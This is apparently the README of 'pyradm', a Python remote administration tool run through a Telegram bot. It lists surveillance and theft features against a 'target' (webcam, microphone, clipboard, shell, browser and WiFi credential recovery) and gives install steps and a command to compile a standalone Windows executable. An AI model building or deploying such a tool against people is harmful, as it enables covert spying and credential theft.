Remote administration crossplatfrom tool via telegram
Coded with โค๏ธ python3 + aiogram3
https://t.me/pt_soft
https://t.me/pt_feedback_bot
Screenshots
All information contained in this repository is provided for educational and research purposes only
The author is not responsible for any illegal use of this tool
- Screenshot from target
- Crossplatform
- Great perfomance (Asynchronous I/O)
- Upload/Download
- Fully compatible shell
- Process list
- Webcam (video record or screenshot)
- Geolocation
- Filemanager
- Microphone
- Clipboard (text, image)
- Windows credentials recovery (browsers, dbs, chats, mail, etc)
- Linux credentials recovery
- WiFi passwords recovery
๐ Many thanks to the LaZagne project
๐ All supported software
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
/winpass - credentials recovery
Press button to download file
Send any file as file for upload to target
git clone https://github.com/akhomlyuk/pyradm.git
cd pyradm
pip3 install -r requirements.txt
Put bot token to cfg.py, ask @Bothfather
python3 main.py
Put bot token to cfg.py
pip install nuitka
nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py